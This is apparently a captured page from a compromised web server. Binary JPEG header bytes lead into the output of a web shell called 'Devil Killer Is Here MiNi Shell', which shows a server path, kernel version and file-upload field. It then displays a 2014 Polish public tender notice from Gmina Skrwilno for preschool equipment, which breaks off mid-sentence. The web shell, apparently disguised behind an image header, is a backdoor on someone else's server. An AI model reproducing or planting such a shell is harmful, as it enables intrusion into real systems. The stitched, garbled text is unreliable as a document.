JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140731/256388-N-2014.html

<p class="kh_header"><b>Skrwilno: Wyposażenie oddziałów przedszkolnych w Okalewie i Skudzawach</b><br>
<b>Numer ogłoszenia: 256388 - 2014; data zamieszczenia: 31.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Skrwilno , ul. Rypińska 7, 87-510 Skrwilno, woj. kujawsko-pomorskie, tel. 054 2700012, faks 054 2700214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.skrwilno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie oddziałów przedszkolnych w Okalewie i Skudzawach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wyposażenie do utrzymania czystości w pomieszczeniach 
1.Odkurzacz  2 sztuki 
Dane techniczne: odkurzacz do pracy na sucho, dwie prędkości pracy silnika
Zasilanie: 230 V, Przepływ powietrza: 42 L na sekundę, Moc całkowita: 1200 W, Podciśnienie: 2500 mm, Długość przewodu: 13 m, Pojemność na sucho: 15 L.Waga: 6,4 kg
Wymiary: 355 x 355 x 480 mm
2.Pralka  2 sztuki 
Kolor biały, wysokość 84,8 cm, szerokość 59,8 cm, głębokość 61,8 cm, prędkość 1000 obr.,
regulacja	obrotów wirówki, wyświetlacz elektroniczny tak, sterowanie elektroniczne, automatyka wagowa tak, opóźniony start tak, zastosowane technologie VarioPerfect, system antywibracyjny, inne	średnica drzwi 30 cm, wskaźnik przedozowania, blokada przed dziećmi, zużycie energii	0,89, zużycie wody 51l., klasa energetyczna A+++, klasa efektywności prania A, klasa wirowania C, kierunek otwierania w lewo, kąt otwierania165,
wsad 8, równomierne rozłożenie ładunku tak, system kontroli piany	 tak, zabezpieczenie przeciw wypływowe tak, niezdejmowany blat , moc grzewcza 2 300, poziom hałasu 53
Doposażenie kuchni
1.Stolik do obróbki ze stali nierdzewnej  2 sztuki 
Stół roboczy z szafką,  Wykonany ze stali nierdzewnej, dopuszczony do stosowania w gastronomii  Głębokość 600 mm  Tylni rant 40 mm  Wymiary 1500 x 600 x 850
 EG-E1070
2.Zmywarka gastronomiczna z wyparzaczem  1 sztuka 
Dane techniczne: Obudowa wykonana z wysokogatunkowej stali nierdzewnej AISI 304 Solidne podwójne drzwi ze wzmocnionymi zawiasami Panel cyfrowy łatwy w obsłudze
Gwarantowana wysoka jakość mycia naczyń dzięki wydajnej pompie oraz górnym i dolnym ramionom myjącym i płuczącym o oddzielnym obiegu wody
 Wyposażone w ergonomiczne i pozbawione ostrych krawędzi prowadnice na kosze
 Niskie koszty eksploatacji i niskie zużycie wody 5 cykli mycia 1, 2, 3, 4, do 10 min, samoczyszczący się spust wody
Gwarantowana temperatura wyparzania +82st.C dzięki systemowi Thermostop Funkcja Miękki Star - pompa załącza się powoli, delikatnie podając wodę aż do osiągnięcia maksimum mocy
Sterowanie elektroniczne
Wysokość wejścia do komory 340 mm
Ilość cykli mycia: 1
Długość cyklu mycia: 3 min
Zużycie wody na cykl 2,8 l
Wydajność: do 18 koszy na godz.
Wyposażenie: 1 kosz uniwersalny 500 x 500, koszyk na sztućce, dozownik nabłyszczacza
Wanna pojemność - moc 24 l - 2,8 kW
 Bojler pojemność - moc 7 l - 2,4 kW
Moc 6,6 kW
Zasilanie 400 V  
Wymiary mm 580 x 600 x 825 h
3. Zmywarka do naczyń - 1 sztuka 
Urządzenie wykonane ze stali nierdzewnej 
Uchwyt profilowany ze stali nierdzewnej 
2 pary ramion myjąco płuczących - góra/dół 
1 cykl pracy - 180 sek. 
 Pojemność komory 26 l. 
Pojemność bojlera 5,5 l. 
 Maksymalna wysokość wsadu 315 mm 
Kosz 50 x 50 cm 
Kosz do talerzy, uniwersalny i pojemnik na sztućce w standardzie 
Dozownik płynu nabłyszczającego w standardzie 
Spełniająca wymogi technologiczne przy wdrażaniu systemu HACCP 
-Zużycie wody 2,5 l. cykl 
4.Szafa chłodnicza  1 sztuka 
Dane techniczne:  w komplecie 4 półki nośność półek do 8 kg
cichy agregat  szafa chłodnicza posiada wymuszony obieg powietrza obudowa urządzenia wykonana ze stali nierdzewnej
 elektroniczny wyświetlacz temperatury
 możliwość regulacji temperatury
 wbudowany zamek na klucz
 temperatura 0+10 C
 litry 350
 moc 0,11 kW
 zasilanie 230 V
 wymiary mm 600x600x1850 h
 S 880405
5.Regał magazynowy  4 sztuki
Dane techniczne: regał wykonany ze stali nierdzewnej o wymiarach:
szerokość 100 cm
głębokość 40 cm
wysokość 180 cm
Sprzęt audiowizualny itp.
1.Telewizor 3 sztuki 
Wymagane parametry: 
 wielkość ekranu cale  42
 rozdzielczość  1920 x 1080
 technologia podświetlenia  LED
liczba wejść HDMI  3 
 moc głośników  2 x 10 W
 dekoder DVB-T
 LAN
 wbudowana karta WiFi
 gwarancja 24 miesiące 
2.Odtwarzacz DVD - 3 sztuki 
Wymagane parametry  rodzaj odtwarzanych płyt: DVD,PAL, DVD-NTSC, DVD+R, DVD+RV, DVD-R, DVD-RW, Audio CD, CD-R, CD-RW, CD-G, Dual Disc
 format plików: MP3, WMA, Divx, MPEG-4, MPEG-2, MPEG-1, L2, MPEG-2, L2
złącza: HDMI, SCART, USB, Audio LR gwarancja: 24 miesiące 
3.Kserokopiarka  2 sztuki 
Wymagane parametry  typ  laserowo monochromatyczna  prędkość kopiowania  20 stron na min.  procesor 400 MHz  RAM  256 MB  rozdzielczość druku 1200 x 1200 dpi  automatyczny wydruk strony rozdzielczość skanowania  300 dpi
interfejs  Ethernet, USB
 maksymalny rozmiar nośnika A3
wyświetlacz  czarno biały ekran dotykowy 5,7 cala
 gwarancja 12 miesięcy 
4.Tablica interaktywna wraz z oprogramowaniem  3 sztuki 
Wymagane parametry przekątna tablicy  88 cala  przekątna powierzchni roboczej  79 cala technologia pozycjonowania - podczerwień sposób obsługi  palec lub dowolny wskaźnik  dźwięk  głośniki w zestawie 
dodatki oprogramowanie do obsługi tablicy, komplet przewodów niezbędnych do podłączenia i prawidłowej pracy zestawu
 gwarancja  36 miesięcy 
5.Projektor  3 sztuki 
Projektor bliskiej odległości do tablicy interaktywnej
6.Uchwyty do tablicy interaktywnej oraz projektora  3 sztuki
Uchwyt kompatybilny z tablicą interaktywną i projektorem 
7.Laptop wraz z oprogramowaniem  3 sztuki 
Wymagane parametry procesor  czterordzeniowy częstotliwość min 1.5 GHz, 2 MB Cache 
 przekątna ekranu  15.6 cala
 nominalna rozdzielczość ekranu  1366 x768 pikseli 
 pamięć RAM  4 GB DDR3
 dysk twardy  1TB
 napęd optyczny  DVD + -RW DL
 wyjścia karty graficznej  HDMI, D Sub
 komunikacja  LAN, WiFi 802.11bgn, bluetooth
 system operacyjny windows 8 PL
gwarancja 12 miesięcy 
8. Drukarka laserowa kolorowa  1 sztuka 
Wymagane parametry
 typ  laserowa kolorowa
 rodzaj urządzenia  jednofunkcyjne  tylko funkcja druku 
 prędkość druku mono  do 40 stron na min
prędkość druku kolor  do 40 stron na min
 procesor  800 MHz
 RAM  512 MB
 rozdzielczość druku mono  1200x1200 dpi
 rozdzielczość druku kolor  1200x1200 dpi
 automatyczny druk dwustronny  tak
 interfejs  Ethernet, USB
 maksymalny rozmiar nośnika A3
 wyświetlacz  4 wierszowy LCD
 gwarancja 12 miesięcy 
9.Zestaw nagłaśniający  1 zestaw 
Wymagane parametry
 kolumna aktywna  1x8 cala głośnik niskotonowy + 25 mm wysokotonowy, moc 120 W rms  200W, maksymalne ciśnienie akustyczne 113 dB na 1m, pasmo przenoszenia 60do20 000 Hz, możliwość mocowania na statywie trójnogu statyw w zestawie, przewody połączone z mikserem w zestawie 
 mikser  2 wejścia MIC-LINE  2 wejścia LINE stereo 1 stereo AUX Returns powroty, może być używane jako dodatkowe wejścia sygnału, możliwość podłączenia zewnętrznego odtwarzacza CD przewód 2xRCA - 2x Jack 6,3 mm w zestawie
odbiornik mikrofonu bezprzewodowego system pracujący w systemie UHF, modulacja FM ,F3E, pasmo częstotliwości 750 do 780 MHz z możliwością ręcznego wyboru kanału pracy, regulacja poziomu wyjściowego, zasilanie zasilaczem DC w zestawie, przewód podłączeniowy z mikserem w zestawie 
 mikrofon bezprzewodowy do ręki  pasmo przenoszenia audio 60do15 000 Hz, wskaźnik LED włączenia niskiego poziomu baterii, przełącznik wyboru częstotliwości, zasilanie 2 x AA 1,5 V, czas pracy około 6 h. 
Meble i wyposażenie sal dydaktycznych
1.Krzesełka dziecięce  75 sztuk
Krzesełko wykonane z kształtownika 20x20 malowanego proszkowo. Siedzisko i oparcie z malowanej sklejki bukowej. 25 sztuk koloru niebieskiego, 25 sztuk koloru zielonego, 25 sztuk czerwonego. Krzesełka przeznaczone do użytku przez dzieci w wieku 4-5 lat. 
Wykonane z rury stalowej O 25.
1.Stoły przedszkolne - 30 sztuk 
Stolik przedszkolny, nogi malowane proszkowo + kolorowe obrzeże + regulacja + blat prostokątny 120x75 cm, grubość blatu 25mm. Stolik regulowany w zakresie 1-3. 10 sztuk, kolor zielony, 10 sztuk kolor żółty, 10 sztuk kolor niebieski. 
1.Biurko dla nauczyciela 3 sztuki 
Biurko dla nauczyciela o wymiarach 1300 x 600 mm. Blat z płyty o grubości 18 mm z obrzeżem PCV. Stelaż metalowy z rury o przekroju kwadratowym 25 x 25 mm malowany proszkowo,  1 biurko kolor czerwony, 2 biurko kolor żółty, 3 biurko kolor fioletowy. 
2.Krzesło obrotowe  3 sztuki 
Krzesło biurowe z tapicerowanym siedziskiem oraz oparciem. Krzesło posiada ruchowy mechanizm CPT pozwalający na regulację siedziska, regulację odległości siedziska od oparcia, regulację kąta nachylenia siedziska względem oparcia. Posiada płynną regulację wysokości siedziska za pomocą podnośnika pneumatycznego. Lekka i stabilna nylonowa pięcioramienna podstawa na miękkich, nierysujących powierzchni kółkach. 
1.Dywan  3 sztuki 
Dywan o wymiarach 4m x 5 m
100% PP HEAT  SET FRISE 
skład runa 100% PP heat-set frise przędza pojedyncza 
 masa powierzchniowa 2.020 + - 202 g na m2
 wysokość runa 8 + - 1mm
 liczba pęczków na 1 m2 275.000 + - 7500 
 2.Biblioteczka - 3 sztuki 
Regał wykonana z płyty wiórowej w tonacji brzozy z kolorowymi elementami z płyty MDF po bokach regału np. jeż z jabłkiem, ślimak lub inne. Regał dwustronny, przeznaczony do przechowywania książek posiadający min. 3 półki.  Wymiary regału to: min. 76cm x72cm x 86cm. 
3.Szafka do sal nr 1  6 sztuk 
Regał posiadający 3 szafki zamykane drzwiami niskimi i jedna otwartą oraz 4 małe szuflady na dole. Wymiary regału to szerokość: 80 cm, wysokość: 125 cm, głębokość: 38cm. Na drzwiczkach frezowane wzory np. królik, kot, słoń itp. Drzwiczki szafek w kolorze. Zewnętrzna strona szuflad w kolorze. 
4.Szafka do sal nr 2 - 6 sztuk
Regał posiadający 3 szafki otwarte i jedną zamkniętą drzwiami niskimi. Wymiary regału: szerokość: 80 cm, wysokość: 85 cm, głębokość: 38 cm. Drzwiczki szafek w kolorze, posiadające frezowane wzory np. królik, kot, słoń itp. 
5.Szafka do sal nr 3  9 sztuk 
Regał posiadający 4 małe zamykane szafki drzwiami niskimi(dwie u góry i dwie na dole oraz pośrodku 1 dużą zamykaną szafkę drzwiami wysokimi. Wymiary regału szerokość 80 cm, wysokość 165 cm, głębokość 38cm. Drzwiczki w kolorze. Na drzwiczkach frezowane wzory np. królik, słoń, kot itp. 
Wyposażenie wypoczynkowe 
1.Leżaczki dla dzieci  30 sztuk 
Leżaczek skonstruowany ze stalowych rurek skręconych śrubami za pomocą narożników. Narożniki wykonane ze sztucznego tworzywa o odpowiedniej wytrzymałości dla dzieci w wieku przedszkolnym. Materiał, którym pokryte są leżaczki to włókna pokryte sztucznym tworzywem. Wymiary około 133 x 57 x 15 cm. Leżaczki w różnych kolorach. 
2.Prześcieradła dziecięce  30 sztuk
Prześcieradło bawełniane z gumką pasujące na leżaczki wymienione w punkcie 1 Wyposażenia wypoczynkowego. Wymiary około 130x60.
3.Wsady do poduszek  30 sztuk
Wsad o wymiarach 40 cmx40cm wypełniony kulką sylikonową. 
4.Poszewki na poduszki 30 sztuk
Poszewki o wymiarach 40cmx40cm pasujące na wsady do poduszek wymienione w punkcie 3 wyposażenia wypoczynkowego. Poszewki z motywami bajkowych postaci. 
5.Kołderki dziecięce  30 sztuk
Kołderka dziecięca pasująca wymiarem do leżaczków wymienionych w punkcie 1 wyposażenia wypoczynkowego około 130cmx60cm. Kołderki w różnych kolorach dodatkowo z aplikacją zawierającą motyw bajkowych postaci. 
6.Kocyki polarowe  30 sztuk
Kocyk wykonany z polaru o wymiarach około 130x60. Kocyki w różnych kolorach lub z nadrukami postaci bajkowych. 
7.Szafka na pościel  3 sztuki 
Szafka służąca do przechowywania pościeli, składająca się z 3 stopni o wymiarach około: wys. 140 cm, szer. 80 cm, głębokość stopnia 40 cm. 
8.Pufy dziecięce  30 sztuk 
Pufa dziecięca wypełniona granulatem polistyrenowym, o pojemności 250 l. o wymiarach około 80cm x 80cm x 80cm. Pufy w różnych motywach zwierzęcych.
Meble do wyposażenia szatni
1.Zestaw szatniowy 5 segmentowy  15 sztuk 
Regał przedszkolny szatniowy 5 segmentowy wykonany z płyty laminowanej 18mm z kolorowym obrzeżem PCV. Posiadający półki u góry, wieszaki i półki na buty na dole. Wymiary: min. 130 cmx105cmx72cm.
Zabawki i pomoce dydaktyczne 
1.Klocki drewniane kolorowe lub równoważne  8 zestawów 
80 elementów w 1 zestawie. Wymiary elementów zróżnicowane np. najmniejszy klocek: 2, 5 x 2, 5 x 2, 5cm a największy klocek: 8, 0 x 2, 5 x 2, 5cm. Klocki w różnych kolorach. 
2.Geometryczne kształty z tworzywa lub równoważne  15 zestawów 
Zestaw kolorowych klocków składający się z max. 250 elementów. Wymiary od 2, 3 x 2, 1 cm do 5 x 4, 3 cm bądź podobne. Wykonane z plastiku o grubości 0, 5 cm. Kształty w różnych kolorach. 
3.Samochód wywrotka  6 szt. 
Zabawka o długości min. 38 cm. 
4.Zestaw narzędzi do majsterkowania  4 zestawy 
Zestaw min. 18 narzędzi, w tym wkrętarka działająca na baterie, zapakowanych w poręczną skrzynkę. 
5.Zestaw perkusyjny  3 zestawy 
Zestaw zawiera 3 różne bębenki, talerz, 2 pałeczki, stojak do zamocowania poszczególnych elementów. Całość wykonana z tworzywa typu plastik. 
6.Koń na biegunach różne kolory  24 sztuk 
Zabawka wykonana z wytrzymałego sztruksu, posiadająca siodło, uprząż, dwa uchwyty. Płozy wykonane z drewna. Obciążenie max 50 kg. Wymiary max  67 × 31 × 77 cm.
7.Piłka do skakania  29 sztuk 
Piłka wykonana z tworzywa typu PCV. Piłka przeznaczona do skakania posiadająca średnicę 50 cm. Różne kolory plus naklejki z bohaterami bajek. 
8.Lalka szmaciana typu ANIA lub równoważne  30 sztuk 
Lalka wykonana z przyjemnego w dotyku materiału np. bawełna. Lalka ubrana w sukienkę lub fartuszek. Lalka posiada włosy spięte w jeden lub dwa warkocze. Wysokość min. 35 cm. Różne, żywe kolory. 
9.Zestaw małego lekarza  3 zestawy 
Zestaw lekarski znajdujący się w dużej walizce. W skład zestawu wchodzą m.in. maska medyczna, drewniana strzykawka, drewniana pinceta, drewniany termometr, drewniana tubka kremu, drewniany przyrząd do mierzenia ciśnienia, oraz prawdziwy plastikowo metalowy stetoskop.
10.Kuchenka  3 sztuki 
Zabawka posiada 4 palnikową płytę kuchenną, do obsługi, której służą przyciski umieszczone na panelu kuchenki. Pod płytą umieszczony piekarnik. Kuchnia posiada blat kuchenny, zlewozmywak, półkę oraz pochłaniacz, na którym można zawiesić sztućce. W zestawie znajdują się również akcesoria dla małej kucharki, np. 2 rondelki, przybory kuchenne, sztućce, talerze, artykuły spożywcze min. 21 elementów dodatkowych akcesoriów.  Wysokość kuchenki min. 80 cm, szerokość min. 72 cm
11.Łazik dla dzieci 10 sztuk różne motywy
Wymiary łazika min. 60 x 28 x 35 cm. Łazik wyposażony w wygodne siedzenie oraz uchwyt do przytrzymywania.  Łaziki stylizowane na różne motywy np. zwierzaki, owady, samochody
12.Pojemnik na zabawki 23 sztuk różne kolory
Pudełko wysokości min. 30 cm, wykonane z półprzezroczystego plastiku w różnych kolorach lub motywach znanych bajek. 
13.Kasa z kalkulatorem dla dzieci  3 sztuki 
Kasa wyposażona jest w m.in.: skaner, waga, klawiaturę numeryczną z wyświetlaczem LCD działającą jak kalkulator, mikrofon, dotykowy panel edukacyjny, otwieraną szufladę na pieniążki. Do kasy dołączono zestaw, w którego skład wchodzą m.in.: plastikowe pieniążki, plastikowa kart płatnicza, długopis, wymienne tablice z produktami, plastikowe produkty.
14.Zestaw do gry w ringo  5 zestawów
Rozkładany zestaw do gry w ringo składający się m.in.: z maty, 5 słupków oraz 6 obręczy. Mata po rozłożeniu o wymiarach min. 71 x 71 x 15 cm. 
15.Tunel dla dzieci typu gąsienic lub równoważne  14 sztuk różne kolory lub motywy
Tunel wykonany z materiału typu poliester o wymiarach min. 46 cm x 180cm. Tunel stylizowany na np. gąsienicę lub zygzak. 
16.Kolorowe woreczki do zajęć rehabilitacyjnych lub gimnastycznych 15 sztuk różne kolory.
Woreczki przeznaczone do zajęć gimnastycznych oraz rehabilitacyjnych o wymiarach m.in.: 10cmx13cm. wykonany z miękkiej tkaniny syntetycznej wypełnione grochem.
17.Miś przytulanka 19 sztuk 
Miś wykonany z bardzo miękkiego, kosmatego pluszu, średniej długości.  Wysokość min. 25 cm. Różne kolory. 
18.Samochód typu wóz strażacki  3 sztuki 
Zabawka o długości min. 45 cm. Posiada wysuwaną drabinę ok 80 cm, wąż nawijany na bęben, odnoszona kabina kierowcy, trzyosiowe zawieszenie, odchylana kabina kierowcy, podpory robocze, moduł świetlno- dźwiękowy 02801, gumowe miękkie koła z profilowanym bieżnikiem, wykonany z najwyższej, jakości tworzywa sztucznego. Pojazd z figurką. 
19.Samochód typu betoniarka  6 sztuk
Zabawka o długości min. 29 cm. Wyposażona w bęben, który można obracać oraz przechylić, aby wysypać np. piasek. Kabina kierowcy unosi się. Dwuosiowe zawieszenie. Zabawka wykonana z elastycznego plastiku wysokiej, jakości.  Pojazd z figurką. 
20.Samochód typu koparka  6 sztuk 
Zabawka o długości min. 65 cm. Zabawka zawiera ruchome elementy łyżkę ładowniczą
21.Puzzle drewniane  14 komplety różne wzory
Drewniana układanka składająca się z 9 elementów. Puzzle w żywych kolorach przyciągających uwagę dziecka.  Różne motywy: pies, kot, słonik, lew, rybka itp.  
Pomoce dydaktyczne 
1.Słuchowiska z bajkami  zestaw edukacyjny  30 sztuk różne bajki
Bajki na płycie CD nagrane w formacie mp3 czytane przez lektora. 
2.Gra planszowa  45 sztuk różne motywy 
Gra przeznaczona dla dzieci od 3 lat. Estetyczna oprawa i proste zasady gry. Gra edukacyjna 
typu farma, grzybobranie. Poszczególne elementy oraz plansze wykonane z grubej, wytrzymałej tektury pokrytej lakierem. 
3.Książka z ćwiczeniami  uczymy się słówek 30 sztuk różne motywy
Książka do nauki słówek języka angielskiego przeznaczona dla dzieci od lat 3. Książka zawierająca karty ze zdjęciami do kserowania i wycięcia. Tematyka ćwiczeń kolory, ubrania, żywność, meble, przedmioty codziennego użytku, przeciwieństwa, ludzie, zabawki, rodzina, uczucia, artykuły szkolne, zawody i inne. Książka dodatkowo może zawierać gry planszowe oraz puzzle z numerami od 1do20. 
4.Gra w skojarzenia  12 sztuk różne motywy w tym wersja z angielskimi słówkami
Układanka ucząca dzieci nazywania i klasyfikowania znanych im przedmiotów. 
5.Ścienna mapa Polski  6 sztuki 
Geograficzna mapa ścienna Polski dla dzieci o wymiarach 140 cm x100 cm. Laminowana laminat matowy, oprawiona na rurkach PCV, w języku polskim. Mapa pełniąca rolę edukacyjną oraz dekoracyjną z zaznaczonymi na niej barwnie regionami i województwami wraz z ukształtowaniem terenu, jak też za pomocą kolorowych piktogramów najbardziej charakterystyczne budowle, zwierzęta, pomniki przyrody, wydarzenia itp. 
6.Gra ćwicząca pamięć dziecka  30 sztuk różne motywy
Gra edukacyjna na pamięć i spostrzegawczość. Dziecko zapamiętuje obrazki i szuka takiego samego. 
7.Gra edukacyjna o Unii Europejskiej  6 sztuki 
Dwustronna gra planszowa, dzięki której dzieci będą miały okazję zaznajomić się z nową, rozszerzoną Wspólnotą Europejską. Odwiedzając stolice różnych krajów, gracze zbierają flagi narodowe i zapoznają się z podstawowymi informacjami na temat każdego z państw członkowskich. Zawartość pudełka: dwustronna plansza do gry, 4 pionki, kostka, 100 kartonowych flag, 4 podkładki do układania flag, instrukcja. Gra przeznaczona dla 2 do 4 graczy, w wieku 6 do 12 lat.
8.Plansze przyrodnicze  6 sztuk 
Duże kartonowe aplikacje umożliwiające ułożenie ciekawej ilustracji tematycznej. Mogą służyć do nauki określania położenia, tworzenia zbiorów i przeliczania. Wykonane z tektury. 
4 plansze, każda z inną porą roku np. 4 sezonowe drzewa. Dodatkowo nazwy pór roku w języku angielskim. 2 pozostałe plansze o innej tematyce dowolnej. 
9.Gra do nauki recyklingu  3 sztuki 
Nowoczesna gra edukacyjna o tematyce ekologicznej. Wymiary planszy: min. 30, 0 x 30, 0 cm. Gra powinna zawierać w zestawie: kostkę do gry, planszę, 4 pojemniki do segregacji śmieci, 4 figurki i 16 żetonów śmieci.
10.Ekologiczne puzzle  15 kompletów różne motywy
Puzzle wykonane z naturalnych materiałów. Do ich produkcji użyto papieru i kartonu pochodzących z recyklingu, roślinnych barwników oraz wodnego lakieru. Puzzle składać się powinny z min. 30 elementów. 
11.Lustro logopedyczne  3 sztuki 
Lustro wykonane z wysokiej jakości pleksi ze specjalnie zaokrąglonymi rogami gwarantuje bezpieczeństwo użytkowania. Do lustra dołączone są drewniane podstawki ze specjalnymi nacięciami, które umożliwiają szybki i łatwy montaż oraz ustawienie lustra w dwóch pozycjach. Wymiary lustra min. 22 cm x 25 cm. 
12.Walizka logopedyczna 3 zestawy 
Walizka wyposażona w zestaw przyrządów do ćwiczeń logopedycznych: wibrator logopedyczny, szpatułki, scraper do ćwiczeń, łopatka głowica, lusterko, bateria. 
13.Liczydło na stojaku  3 sztuki 
Duże drewniane liczydło zawierające 100 korali rozłożonych w 10 rzędach z kolorystycznie wyróżnionymi piątkami i przekroczeniem dziesiątek. Stabilny rozkładany stojak. 
14.Duża linijka magnetyczna  3 sztuki 
Miara o długości 3 metrów. W jej skład wchodzą elementy magnetyczne. 
Szczegółowe warunki dotyczące zamówienia.
1.Przedmiotem zamówienia publicznego jest wyposażenie w oddziałach przedszkolnych w Okalewie i w Skudzawach w ramach projektu pt. Modernizacja oddziałów przedszkolnych przy szkołach podstawowych w gminie Skrwilno, w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej, jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki.
2.Zamawiający wymaga od Wykonawcy dostarczenia własnym transportem zakupionych towarów łącznie z rozładowaniem na koszt własny i ryzyko, w godzinach i dniach pracy oraz do miejsc wskazanych przez Zamawiającego. 
3.Zakupiony asortyment musi posiadać
